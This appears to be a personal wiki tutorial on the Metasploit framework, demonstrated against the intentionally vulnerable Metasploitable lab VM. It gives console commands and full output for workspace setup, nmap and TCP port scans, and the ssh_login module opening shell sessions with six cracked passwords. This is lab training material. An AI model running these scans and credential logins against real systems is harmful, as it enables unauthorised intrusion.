From charlesreid1

(Redirected from Metasploit)

Metasploit framework info: http://docs.kali.org/general-use/starting-metasploit-framework-in-kali

Also see Metasploitable for Metasploit in action!

Basics

Fire up metasploit:

$ msfconsole

Get some help:

msf> ?

Use a particular exploit:

msf> use some/particular/exploit

Show info about how to use the exploit:

msf> info 
msf> info some/particular/exploit

Set your variables:

msf> set RHOST 127.0.0.1

Run the exploit:

msf> run

Not-So-Basics

Initializing DB

First, you want postgresql to run as a server:

$ service postgresql start

This is the database format that MSF uses.

Now initialize the database:

$ msfdb init

Running

To get a metasploit console, run

$ msfconsole

Capturing Metasploit Console Output

If you want to capture the output you're seeing in Metasploit framework console, you can use the spool command.

spool /root/box/metasploitable/metasploit.log

If the spool command is not accessible, use the msfupdate command.

msf > spool /root/box/metasploitable/metasploit.log
[*] Spooling to file /root/box/metasploitable/metasploit.log...
msf > 

To stop recording, set spool to off:

msf > spool off
[*] Spooling is now disable
msf > 

Ninja

How to exploit hosts that aren't available remotely

Suppose you're not a client trying to exploit a server, but are a server trying to exploit a client.

What can you do?

Metasploit/Exploiting_Clients

Advanced

Creating Workspace

You can create a workspace to save scan information:

msf > db_status
[*] postgresql connected to msf
msf > workspace
* default
msf > workspace metasploitable
[-] Workspace not found: metasploitable
msf > workspace -a metasploitable
[*] Added workspace: metasploitable
msf > workspace
  default
* metasploitable
msf > workspace -h
Usage:
    workspace                  List workspaces
    workspace [name]           Switch workspace
    workspace -a [name] ...    Add workspace(s)
    workspace -d [name] ...    Delete workspace(s)
    workspace -D               Delete all workspaces
    workspace -r <old> <new>   Rename workspace
    workspace -h               Show this help information

msf >

Reloading Workspace

You can reload a workspace by listing all workspaces, then type workspace [name]. Here, I reload the metasploitable workspace:

msf > db_status
[*] postgresql connected to msf
msf > workspace
* default
  metasploitable
msf > workspace metasploitable
[*] Workspace: metasploitable
msf >

Nmap Scan Into Workspace

Use db_nmap instead of nmap to store info in database:

msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:54 PDT
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 1.68 seconds
msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:55 PDT
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 1.67 seconds
msf > db_nmap -A -O -sS -sV 10.0.0.27
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-26 02:55 PDT
[*] Nmap: Nmap scan report for 10.0.0.27
[*] Nmap: Host is up (0.0015s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: |_Not valid after:  2010-04-16T14:07:45
[*] Nmap: |_ssl-date: 2016-03-25T23:42:57+00:00; -10h12m30s from scanner time.
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: | dns-nsid:
[*] Nmap: |_  bind.version: 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
[*] Nmap: |_http-title: Metasploitable2 - Linux
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: |   program version   port/proto  service
[*] Nmap: |   100000  2            111/tcp  rpcbind
[*] Nmap: |   100000  2            111/udp  rpcbind
[*] Nmap: |   100003  2,3,4       2049/tcp  nfs
[*] Nmap: |   100003  2,3,4       2049/udp  nfs
[*] Nmap: |   100005  1,2,3      42714/tcp  mountd
[*] Nmap: |   100005  1,2,3      46675/udp  mountd
[*] Nmap: |   100021  1,3,4      33001/tcp  nlockmgr
[*] Nmap: |   100021  1,3,4      58755/udp  nlockmgr
[*] Nmap: |   100024  1          35518/udp  status
[*] Nmap: |_  100024  1          46140/tcp  status
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
[*] Nmap: 513/tcp  open  login?
[*] Nmap: 514/tcp  open  tcpwrapped
[*] Nmap: 1099/tcp open  java-rmi    Java RMI Registry
[*] Nmap: 1524/tcp open  shell       Metasploitable root shell
[*] Nmap: 2049/tcp open  nfs         2-4 (RPC #100003)
[*] Nmap: 2121/tcp open  ftp         ProFTPD 1.3.1
[*] Nmap: 3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: |   Protocol: 53
[*] Nmap: |   Version: .0.51a-3ubuntu5
[*] Nmap: |   Thread ID: 10
[*] Nmap: |   Capabilities flags: 43564
[*] Nmap: |   Some Capabilities: Speaks41ProtocolNew, Support41Auth, SupportsTransactions, SwitchToSSLAfterHandshake, LongColumnFlag, SupportsCompression, ConnectWithDatabase
[*] Nmap: |   Status: Autocommit
[*] Nmap: |_  Salt: [k*.G\v`^63:h~cRR'eM
[*] Nmap: 5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
[*] Nmap: 5900/tcp open  vnc         VNC (protocol 3.3)
[*] Nmap: | vnc-info:
[*] Nmap: |   Protocol version: 3.3
[*] Nmap: |   Security types:
[*] Nmap: |_    Unknown security type (33554432)
[*] Nmap: 6000/tcp open  X11         (access denied)
[*] Nmap: 6667/tcp open  irc         Unreal ircd
[*] Nmap: 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
[*] Nmap: |_ajp-methods: Failed to get a valid response for the OPTION request
[*] Nmap: 8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: |_http-favicon: Apache Tomcat
[*] Nmap: |_http-server-header: Apache-Coyote/1.1
[*] Nmap: |_http-title: Apache Tomcat/5.5
[*] Nmap: MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 - 2.6.33
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Host script results:
[*] Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
[*] Nmap: | smb-os-discovery:
[*] Nmap: |   OS: Unix (Samba 3.0.20-Debian)
[*] Nmap: |   NetBIOS computer name:
[*] Nmap: |   Workgroup: WORKGROUP
[*] Nmap: |_  System time: 2016-03-25T19:42:53-04:00
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   1.47 ms 10.0.0.27
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 78.16 seconds

This information will be imported and parsed accordingly:

msf > hosts

Hosts
=====

address    mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---                ----  -------  ---------  -----  -------  ----  --------
10.0.0.27  08:00:27:47:98:ad        Linux               2.6.X  server

msf >

Back Up Workspace

To back up a workspace, use db_export:

msf > db_export -h
dUsage:
    db_export -f <format> [filename]
    Format can be one of: xml, pwdump
[-] No output file was specified
msf > db_export -f xml /root/metasploitable.xml
[*] Starting export of workspace metasploitable to /root/metasploitable.xml [ xml ]...
[*]     >> Starting export of report
[*]     >> Starting export of hosts
[*]     >> Starting export of events
[*]     >> Starting export of services
[*]     >> Starting export of web sites
[*]     >> Starting export of web pages
[*]     >> Starting export of web forms
[*]     >> Starting export of web vulns
[*]     >> Starting export of module details
[*]     >> Finished export of report
[*] Finished export of workspace metasploitable to /root/metasploitable.xml [ xml ]...
msf >

Dealing With Hosts

The interface for using the hosts information is very powerful. We can use the -c switch to control what columns are shown:

msf > hosts -c address,os_name

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

msf >

We can also narrow down results (if we have a large number of hosts on a network) by searching for strings:

msf > hosts -c address,os_name -S linux

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

msf >

Passing Hosts to RHOST

If we have loaded a module, like auxiliary/scanner/portscan/tcp, we can use the hosts to define our scan targets with the -R flag when searching. (This can add multiple remote hosts to a scan - handy for long lists of hosts.)

It will also add the output of each scan/each module that is run to the database. Running a TCP scan will identify open ports, and each of those open ports will be added to the workspace/Metasploit database.

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf auxiliary(tcp) > hosts -c address,os_name -S linux -R

Hosts
=====

address    os_name
-------    -------
10.0.0.27  Linux

RHOSTS => 10.0.0.27

msf auxiliary(tcp) > run

[*] 10.0.0.27:22 - TCP OPEN
[*] 10.0.0.27:23 - TCP OPEN
[*] 10.0.0.27:21 - TCP OPEN
[*] 10.0.0.27:25 - TCP OPEN
[*] 10.0.0.27:53 - TCP OPEN
[*] 10.0.0.27:80 - TCP OPEN
[*] 10.0.0.27:111 - TCP OPEN
[*] 10.0.0.27:139 - TCP OPEN
[*] 10.0.0.27:445 - TCP OPEN
[*] 10.0.0.27:514 - TCP OPEN
[*] 10.0.0.27:513 - TCP OPEN
[*] 10.0.0.27:512 - TCP OPEN
[*] 10.0.0.27:1099 - TCP OPEN
[*] 10.0.0.27:1524 - TCP OPEN
[*] 10.0.0.27:2049 - TCP OPEN
[*] 10.0.0.27:2121 - TCP OPEN
[*] 10.0.0.27:3306 - TCP OPEN
[*] 10.0.0.27:3632 - TCP OPEN
[*] 10.0.0.27:5432 - TCP OPEN
[*] 10.0.0.27:5900 - TCP OPEN
[*] 10.0.0.27:6000 - TCP OPEN
[*] 10.0.0.27:6667 - TCP OPEN
[*] 10.0.0.27:6697 - TCP OPEN
[*] 10.0.0.27:8009 - TCP OPEN
[*] 10.0.0.27:8180 - TCP OPEN
[*] 10.0.0.27:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

This process will create a deluge of packet traffic between the attacker (morpheus) and the target (metasploitable, 10.0.0.27), as shown by tcpdump:

# tcpdump -i eth0

[...]

03:35:33.494539 IP morpheus.38946 > 10.0.0.27.7745: Flags [S], seq 4229817845, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.494905 IP morpheus.56392 > 10.0.0.27.7746: Flags [S], seq 2209661380, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.494955 IP 10.0.0.27.7745 > morpheus.38946: Flags [R.], seq 0, ack 4229817846, win 0, length 0
03:35:33.495132 IP 10.0.0.27.7746 > morpheus.56392: Flags [R.], seq 0, ack 2209661381, win 0, length 0
03:35:33.495282 IP morpheus.44735 > 10.0.0.27.7747: Flags [S], seq 1306640419, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.496069 IP 10.0.0.27.7747 > morpheus.44735: Flags [R.], seq 0, ack 1306640420, win 0, length 0
03:35:33.496090 IP morpheus.42604 > 10.0.0.27.7749: Flags [S], seq 1345082972, win 29200, options [mss 1460,sackOK,TS val 67880356 ecr 0,nop,wscale 10], length 0
03:35:33.496357 IP 10.0.0.27.7749 > morpheus.42604: Flags [R.], seq 0, ack 1345082973, win 0, length 0
03:35:33.708617 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98
03:35:33.816292 IP6 2601:602:8901:d335:bcd1:65ff:fe92:6371.48457 > ff05::c.1900: UDP, length 98
03:35:33.833652 IP morpheus.46610 > 10.0.0.27.7753: Flags [S], seq 2211519157, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.834214 IP morpheus.52147 > 10.0.0.27.7751: Flags [S], seq 2171151102, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.834335 IP 10.0.0.27.7753 > morpheus.46610: Flags [R.], seq 0, ack 2211519158, win 0, length 0
03:35:33.834502 IP 10.0.0.27.7751 > morpheus.52147: Flags [R.], seq 0, ack 2171151103, win 0, length 0
03:35:33.834831 IP morpheus.43955 > 10.0.0.27.7752: Flags [S], seq 1337658889, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.835315 IP 10.0.0.27.7752 > morpheus.43955: Flags [R.], seq 0, ack 1337658890, win 0, length 0
03:35:33.835404 IP morpheus.48124 > 10.0.0.27.7755: Flags [S], seq 2750644096, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.835964 IP morpheus.41084 > 10.0.0.27.7756: Flags [S], seq 2965282008, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.836016 IP 10.0.0.27.7755 > morpheus.48124: Flags [R.], seq 0, ack 2750644097, win 0, length 0
03:35:33.836268 IP 10.0.0.27.7756 > morpheus.41084: Flags [R.], seq 0, ack 2965282009, win 0, length 0
03:35:33.836544 IP morpheus.53623 > 10.0.0.27.7757: Flags [S], seq 1989216855, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.836835 IP 10.0.0.27.7757 > morpheus.53623: Flags [R.], seq 0, ack 1989216856, win 0, length 0
03:35:33.837113 IP morpheus.34173 > 10.0.0.27.7758: Flags [S], seq 462052512, win 29200, options [mss 1460,sackOK,TS val 67880441 ecr 0,nop,wscale 10], length 0
03:35:33.837454 IP 10.0.0.27.7758 > morpheus.34173: Flags [R.], seq 0, ack 462052513, win 0, length 0
03:35:33.837707 IP morpheus.39847 > 10.0.0.27.7759: Flags [S], seq 4103494796, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.837976 IP 10.0.0.27.7759 > morpheus.39847: Flags [R.], seq 0, ack 4103494797, win 0, length 0
03:35:33.838475 IP morpheus.51488 > 10.0.0.27.7760: Flags [S], seq 3689956999, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.838757 IP 10.0.0.27.7760 > morpheus.51488: Flags [R.], seq 0, ack 3689957000, win 0, length 0
03:35:33.840901 IP morpheus.37018 > 10.0.0.27.7754: Flags [S], seq 2708295021, win 29200, options [mss 1460,sackOK,TS val 67880442 ecr 0,nop,wscale 10], length 0
03:35:33.841397 IP 10.0.0.27.7754 > morpheus.37018: Flags [R.], seq 0, ack 2708295022, win 0, length 0
03:35:33.926962 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98
03:35:34.034038 IP6 fe80::bcd1:65ff:fe92:6371.48457 > ff02::c.1900: UDP, length 98
03:35:34.149946 IP 10.0.0.1.55203 > 239.255.255.250.1900: UDP, length 104
03:35:34.166687 IP morpheus.59867 > 10.0.0.27.7763: Flags [S], seq 3464606117, win 29200, options [mss 1460,sackOK,TS val 67880524 ecr 0,nop,wscale 10], length 0
03:35:34.167308 IP 10.0.0.27.7763 > morpheus.59867: Flags [R.], seq 0, ack 3464606118, win 0, length 0

Services

Once we have done an Nmap and TCP scan, we know what services are running and what ports are open.

Show the services that are up with services -u:

msf auxiliary(tcp) > services -u

Services
========

host       port  proto  name         state  info
----       ----  -----  ----         -----  ----
10.0.0.27  21    tcp    ftp          open   vsftpd 2.3.4
10.0.0.27  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
10.0.0.27  23    tcp    telnet       open   Linux telnetd
10.0.0.27  25    tcp    smtp         open   Postfix smtpd
10.0.0.27  53    tcp    domain       open   ISC BIND 9.4.2
10.0.0.27  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
10.0.0.27  111   tcp    rpcbind      open   2 RPC #100000
10.0.0.27  139   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  445   tcp    netbios-ssn  open   Samba smbd 3.X workgroup: WORKGROUP
10.0.0.27  512   tcp    exec         open   netkit-rsh rexecd
10.0.0.27  513   tcp    login        open
10.0.0.27  514   tcp    tcpwrapped   open
10.0.0.27  1099  tcp    java-rmi     open   Java RMI Registry
10.0.0.27  1524  tcp    shell        open   Metasploitable root shell
10.0.0.27  2049  tcp    nfs          open   2-4 RPC #100003
10.0.0.27  2121  tcp    ftp          open   ProFTPD 1.3.1
10.0.0.27  3306  tcp    mysql        open   MySQL 5.0.51a-3ubuntu5
10.0.0.27  3632  tcp                 open
10.0.0.27  5432  tcp    postgresql   open   PostgreSQL DB 8.3.0 - 8.3.7
10.0.0.27  5900  tcp    vnc          open   VNC protocol 3.3
10.0.0.27  6000  tcp    x11          open   access denied
10.0.0.27  6667  tcp    irc          open   Unreal ircd
10.0.0.27  6697  tcp                 open
10.0.0.27  8009  tcp    ajp13        open   Apache Jserv Protocol v1.3
10.0.0.27  8180  tcp    http         open   Apache Tomcat/Coyote JSP engine 1.1
10.0.0.27  8787  tcp                 open

msf auxiliary(tcp) >

Credentials

Like services, credentials are also accrued in the database.

msf > creds

Credentials
===========

host  port  user  pass  type  active?
----  ----  ----  ----  ----  -------

[*] Found 0 credentials.

Once you find credentials, you can add them manually. We found credentials for 6 out of 7 users with John the Ripper (see Metasploitable/John Shadow File):

password         (username)
-----------------------------------
postgres         (postgres)
user             (user)
msfadmin         (msfadmin)
service          (service)
batman           (sys)
123456789        (klog)

Add them by using the ssh_login module:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
msf auxiliary(ssh_login) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin
msf auxiliary(ssh_login) > set PASSWORD msfadmin
PASSWORD => msfadmin
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.0.5:45812 -> 10.0.0.27:22) at 2016-03-26 17:23:11 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

More Credentials

Run each of the other credentials we found. Everything goes ok, up until the last one, username klog


msf auxiliary(ssh_login) > set USERNAME user
USERNAME => user
msf auxiliary(ssh_login) > set PASSWORD user
PASSWORD => user
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (10.0.0.5:50289 -> 10.0.0.27:22) at 2016-03-26 17:25:16 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME postgres
USERNAME => postgres
msf auxiliary(ssh_login) > set PASSWORD postgres
PASSWORD => postgres
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 3 opened (10.0.0.5:57606 -> 10.0.0.27:22) at 2016-03-26 17:25:25 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME service
USERNAME => service
msf auxiliary(ssh_login) > set PASSWORD service
PASSWORD => service
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'service:service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 4 opened (10.0.0.5:52395 -> 10.0.0.27:22) at 2016-03-26 17:25:36 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME sys
USERNAME => sys
msf auxiliary(ssh_login) > set PASSWORD batman
PASSWORD => batman
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'sys:batman' 'uid=3(sys) gid=3(sys) groups=3(sys) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 5 opened (10.0.0.5:34297 -> 10.0.0.27:22) at 2016-03-26 17:25:56 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > set USERNAME klog
USERNAME => klog
msf auxiliary(ssh_login) > set PASSWORD 123456789
PASSWORD => 123456789
msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 SSH - Starting bruteforce
[+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '
[*] Command shell session 6 opened (10.0.0.5:47907 -> 10.0.0.27:22) at 2016-03-26 17:26:08 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 10.0.0.27 - Command shell session 6 closed.  Reason: Died from EOFError
msf auxiliary(ssh_login) >

That message tells us that the klog user doesn't have a home directory:

[+] 10.0.0.27:22 SSH - Success: 'klog:123456789' 'Could not chdir to home directory /home/klog: No such file or directory Could not chdir to home directory /home/klog: No such file or directory '

Seeing the Creds

Once you've got some creds:

msf auxiliary(ssh_login) > creds

Credentials
===========

host       origin     service       public    private    realm  private_type
----       ------     -------       ------    -------    -----  ------------
10.0.0.27  10.0.0.27  22/tcp (ssh)  msfadmin  msfadmin          Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  user      user              Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  postgres  postgres          Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  service   service           Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  sys       batman            Password
10.0.0.27  10.0.0.27  22/tcp (ssh)  klog      123456789         Password

Next step is getting some loot.

Usage Example: Metasploitable Virtual Box

Main page for Metasploitable virtual box: Metasploitable

As an example of how we can use metasploit, we'll be looking at the Metasploitable virtual box.

Setting Up Metasploitable

Downloaded virtual disk image, loaded it up in a 64-bit Linux virtualbox instance.

The networking configuration was, I had the VirtualBox instance running on a Mac, and was attacking from a machine running Kali Linux. Both computers were on a private network and o n the same subnet.

From VirtualBox, I created a bridged network adapter (meaning, VirtualBox can send/receive messages directly through that interface). Next, I flipped the switch on the VirtualBox, and away we went. The router automatically assigned an IP address to the Metasploitable VirtualBox.


Recon

Let's take a few first steps in Metasploit, using the Metasploitable virtual box.

Make a record-keeping box for stuff:

$ mkdir -p box/metasploitable

Start by using nmap to scan the host.

First a fast scan -F:

$ nmap -F 10.0.0.*

Then we can do a more extensive scan:

$ nmap -sS 10.0.0.*

This reveals the IP address of the VirtualBox, which is 10.0.0.27.

We can also do a deeper scan:

$ nmap -sS -sV -A 10.0.0.27

This will reveal an array of services, some of which may be exploitable using metasploit.

Sure enough, the verbose scan returns lots of good information:

$ nmap -sS -sV -A 10.0.0.27

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-22 18:30 PDT
Nmap scan report for 10.0.0.27
Host is up (0.016s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2016-03-23T01:31:31+00:00; +33s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      42810/tcp  mountd
|   100005  1,2,3      45599/udp  mountd
|   100021  1,3,4      34385/tcp  nlockmgr
|   100021  1,3,4      60702/udp  nlockmgr
|   100024  1          38085/udp  status
|_  100024  1          52004/tcp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    Java RMI Registry
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, LongColumnFlag, SupportsCompression
|   Status: Autocommit
|_  Salt: w$K,8vk7k8tagd@PR*zK
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 1:05:20
|   source ident: nmap
|   source host: 6D4CD63B.D3975B40.7B559A54.IP
|_  error: Closing Link: cxfhgnbdt[10.0.0.25] (Quit: cxfhgnbdt)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
